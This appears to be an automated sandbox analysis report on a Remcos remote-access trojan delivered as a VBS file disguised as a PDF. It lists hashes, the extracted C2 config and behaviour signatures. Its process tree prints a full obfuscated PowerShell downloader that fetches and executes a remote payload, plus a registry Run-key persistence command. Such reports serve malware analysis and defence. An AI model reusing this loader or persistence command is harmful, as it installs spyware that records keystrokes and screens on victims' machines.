Overview

overview

10

Static

static

1

證據_890...df.vbs

windows7-x64

10

證據_890...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    194s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 03:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    證據_89004161-000002102-66_20241128·pdf.vbs

  • Size

    33KB

  • MD5

    b87c82bba48c44f8fc387ecd6100ff0e

  • SHA1

    2cdcb7b8b4f5a8b0501a121b6b4264aa7c6b2f57

  • SHA256

    20100ee5a74b50849ea1a00363a6751320c9aab43ba31859f79147af1b56b509

  • SHA512

    442d105706dcc997c39a141d7a944bbb961e8948d15caee81814f1a6d6245e46b00bf98e893c1623bd92b12b1ac440432fd26f4fd9166c5ffea8ac9a575af189

  • SSDEEP

    768:5KSasMUqkx36r142byXNoPNhZqpCtHki2ynMVVX09rkFJC:ISas/RF6hWyPN/MbZ09oFM

Score
10/10
remcosremotehostdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\證據_89004161-000002102-66_20241128·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) {Remanufactures139 (Bibiann 'Sisk$ B rgRstelHansoSurrbSlgtaSau.l sca: OffPTreka M,lrDispaUdr p EkstBadeeLydbr Idea Le lPian=Port$ DisHAtt a.emel.tdteHerbtPre u IntdHe.msE ple') ;Remanufactures139 $Spadestikkets246;Remanufactures139 (Bibiann 'PyresF tiTJordaSpisrPremtFi b-WolfST ndlP,tbe SememadkP Sva hypa4');Remanufactures139 (Bibiann 'Anti$ losgIrreLNulloDe iBD.elASa dLPung: AllK D.toSavnMHo ePMauvLSljdEupo,mBackEw.etn MrkTAminvradiiVestnOldskStorLBaljeIndlrPrecnUna,ER krsMaen= Udf(TnkeT indE StvSPromt inn-TagspTogvaKarttKlinhRegr ,rre$S riIAkkvN FladEphoeSos kSt lS KonEOm,lrMoorIbrutNProdgjorde HumNAct sSlag)') ;Remanufactures139 (Bibiann 'Wret$CarggCleaLSiruoKwapBAmorA Fjal,ksp: PlyiCultNAl oFReshLToppeUpo CBrakTDhanE eldd For=M,rr$BehoGMenul,rnrO humbMasoaMas,lA te:S,lfwCensoT,rio Mo,dH.apG An,O M kLNonfED ctmB ni+Kvrk+Ho e%m ll$Vik.WUnarAFar.M.dble.rodFIm ru k.nLaposSStri2Desi4 Kva2Preb. A,vcStano RinUPr cnSme t') ;$Tvrfagenes=$Wamefuls242[$Inflected]}$Ryddeliges=280530;$Brickwork=30269;Remanufactures139 (Bibiann 'Herr$Sm lgRelalForuo U obBiblAArrolIhuk:Garno KompKollr KriR,eucSAffiS DortHemaI nsFMispTKrake ChuRDice8Insp0ss n Phar= Ama IndsgKakkeTyreThigh- Po cExamO ,itnDa,kTBulbeSaxoN.creT Uds Si j$SlutIEighNceraDMu leI stk TansSammEBredrPas ILigbn ropgSlouEKaleNS ips');Remanufactures139 (Bibiann ' I a$Sangg Dejl rvlonor bSolhaForslRec : N dDHa myBiblsGroufRehaaUndesHam iLeersTheo .ent= Dat hv s[OmdbSSludy armsNedstmbeleAbenmSpid. OpsCSkipoNdstn Po,vprobePrgnrFunkt Fer] arv:u.or:UnliF ,ibr BonoPyt,mI lgB ervaunresTilfeSme,6Doce4BulnS istUdmar S mi DernHerigLogf(H.rk$Eu.oO D spXylorKommrH emsForvs,hontVensiSalgf subt Tawe Halr Rew8U,op0rets)');Remanufactures139 (Bibiann ' Inq$Vineg MaslSideONonrBMyreaHel L Khi:haanp ederUndiOYndlpParaO ourrForstNonfiCircoMicrNMu saJuniB Be iKatoLForvIErrot SarYOutl2Forg4Fr g5Inte dfr=Cygn Bi f[SlavsSu jYSkgvSFremtLoboESeelm,fre.HypeTD saeCompxMeruT la.RoutEVirvnpr icFjlmOGeosDreaki supnomnigK rt]Unev:Ljtn:U puAHumoSTra,CSweeiPersIDac .Sch.G ConE P,nTMultsSnapTRigarIn,eI hrNUppeGGuln( Kon$TreddHingYOrbiSPjadF MaiAafflSLetfIAndosKvad)');Remanufactures139 (Bibiann 'Ochr$ Svrg TrvLM ckOAccebHemoaExcoLLith:TackgNeptr BioUU.hntSkvmnDybdIHoffNGynegAntieGrafNF.risSkep=Or a$ SeePTrenRRu.kODesuPun aOTootr,ocit M tiVarmO HalN.limaSuccbFac IrefeLMasciGo pTK aly ,et2Inte4bibl5Midt.,ntisTheruDiabB Pe sA ettMeshrC nhi Menn BurG Fes(De a$ ankRAngiYAaredTranD,rigEGlocL othiSatsgflooE Pres Det,Hemi$ ChaBUnveRSulciRoknc R sKSvanWDrisoGal R epKSem.)');Remanufactures139 $Grutningens;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2556
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) {Remanufactures139 (Bibiann 'Sisk$ B rgRstelHansoSurrbSlgtaSau.l sca: OffPTreka M,lrDispaUdr p EkstBadeeLydbr Idea Le lPian=Port$ DisHAtt a.emel.tdteHerbtPre u IntdHe.msE ple') ;Remanufactures139 $Spadestikkets246;Remanufactures139 (Bibiann 'PyresF tiTJordaSpisrPremtFi b-WolfST ndlP,tbe SememadkP Sva hypa4');Remanufactures139 (Bibiann 'Anti$ losgIrreLNulloDe iBD.elASa dLPung: AllK D.toSavnMHo ePMauvLSljdEupo,mBackEw.etn MrkTAminvradiiVestnOldskStorLBaljeIndlrPrecnUna,ER krsMaen= Udf(TnkeT indE StvSPromt inn-TagspTogvaKarttKlinhRegr ,rre$S riIAkkvN FladEphoeSos kSt lS KonEOm,lrMoorIbrutNProdgjorde HumNAct sSlag)') ;Remanufactures139 (Bibiann 'Wret$CarggCleaLSiruoKwapBAmorA Fjal,ksp: PlyiCultNAl oFReshLToppeUpo CBrakTDhanE eldd For=M,rr$BehoGMenul,rnrO humbMasoaMas,lA te:S,lfwCensoT,rio Mo,dH.apG An,O M kLNonfED ctmB ni+Kvrk+Ho e%m ll$Vik.WUnarAFar.M.dble.rodFIm ru k.nLaposSStri2Desi4 Kva2Preb. A,vcStano RinUPr cnSme t') ;$Tvrfagenes=$Wamefuls242[$Inflected]}$Ryddeliges=280530;$Brickwork=30269;Remanufactures139 (Bibiann 'Herr$Sm lgRelalForuo U obBiblAArrolIhuk:Garno KompKollr KriR,eucSAffiS DortHemaI nsFMispTKrake ChuRDice8Insp0ss n Phar= Ama IndsgKakkeTyreThigh- Po cExamO ,itnDa,kTBulbeSaxoN.creT Uds Si j$SlutIEighNceraDMu leI stk TansSammEBredrPas ILigbn ropgSlouEKaleNS ips');Remanufactures139 (Bibiann ' I a$Sangg Dejl rvlonor bSolhaForslRec : N dDHa myBiblsGroufRehaaUndesHam iLeersTheo .ent= Dat hv s[OmdbSSludy armsNedstmbeleAbenmSpid. OpsCSkipoNdstn Po,vprobePrgnrFunkt Fer] arv:u.or:UnliF ,ibr BonoPyt,mI lgB ervaunresTilfeSme,6Doce4BulnS istUdmar S mi DernHerigLogf(H.rk$Eu.oO D spXylorKommrH emsForvs,hontVensiSalgf subt Tawe Halr Rew8U,op0rets)');Remanufactures139 (Bibiann ' Inq$Vineg MaslSideONonrBMyreaHel L Khi:haanp ederUndiOYndlpParaO ourrForstNonfiCircoMicrNMu saJuniB Be iKatoLForvIErrot SarYOutl2Forg4Fr g5Inte dfr=Cygn Bi f[SlavsSu jYSkgvSFremtLoboESeelm,fre.HypeTD saeCompxMeruT la.RoutEVirvnpr icFjlmOGeosDreaki supnomnigK rt]Unev:Ljtn:U puAHumoSTra,CSweeiPersIDac .Sch.G ConE P,nTMultsSnapTRigarIn,eI hrNUppeGGuln( Kon$TreddHingYOrbiSPjadF MaiAafflSLetfIAndosKvad)');Remanufactures139 (Bibiann 'Ochr$ Svrg TrvLM ckOAccebHemoaExcoLLith:TackgNeptr BioUU.hntSkvmnDybdIHoffNGynegAntieGrafNF.risSkep=Or a$ SeePTrenRRu.kODesuPun aOTootr,ocit M tiVarmO HalN.limaSuccbFac IrefeLMasciGo pTK aly ,et2Inte4bibl5Midt.,ntisTheruDiabB Pe sA ettMeshrC nhi Menn BurG Fes(De a$ ankRAngiYAaredTranD,rigEGlocL othiSatsgflooE Pres Det,Hemi$ ChaBUnveRSulciRoknc R sKSvanWDrisoGal R epKSem.)');Remanufactures139 $Grutningens;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\Software\lestiwarite\').Generalljtnanten;%Emboldened% ($Melolonthinae)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\Software\lestiwarite\').Generalljtnanten;%Emboldened% ($Melolonthinae)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:320

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    a20ba27c009ab1993dcb85a22f7cecb0

    SHA1

    6d95109921764b5552afde6ccad50357f38d4aa9

    SHA256

    fe7c132d881b372c0af35d914867217bfb9462eff5dd1b5ab09de3b85fcbf102

    SHA512

    4fcb2e2b3a5c14866211131d43225f4dfa0fd0ed45e345faf6763c3f321dd299eaebf1fb3702589a8686e95f7fdaff25e6dd8c97477f6bbb9e31135c342cfc5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab9DF6.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar4589.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Epitympanum.Ply
    Filesize

    404KB

    MD5

    02520ab781931d06c03af0071b4cbe02

    SHA1

    1a35dae7b75807fb4cb35e06ee57cba219710491

    SHA256

    dd89e82b3e8fd742b6c039805c442693d61d25dfcd3804bc0d2ad19ff0d0e0e8

    SHA512

    27f47814f3061d9c86e1cd6654d8b9e3f1ccbf38ce1379f88a946ff4e0e4a16c32300f7541b6098bc03a14752cfe780b4b5efde8ec740522d113dffd838dae9e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0FSFZIVOC5JB6S23E5WB.temp
    Filesize

    7KB

    MD5

    617cfa448b67491076d9a58163240984

    SHA1

    d1aedd861ae9fd62dc81cc380f7a8d41a8716334

    SHA256

    a39d42fbcd06aec77307d6f5e0da0945b85e9988d3265167d893a3359dffb856

    SHA512

    0743a28779a92bf2e271b523484bdcdba155d580f3f80fd642cea1e8552dc31a06a0799d90328320d1659a7ed443d878d87ec001103b84689fd0153803e5d86b

    Download Submit

  • memory/2360-60-0x0000000000B50000-0x0000000001BB2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2360-37-0x0000000000B50000-0x0000000001BB2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2556-23-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2556-27-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2556-29-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2556-30-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2556-32-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2556-26-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2556-25-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2556-24-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2556-22-0x0000000002990000-0x0000000002998000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2556-21-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2556-20-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2708-36-0x0000000006730000-0x0000000009A73000-memory.dmp

    Filesize

    51.3MB

    Download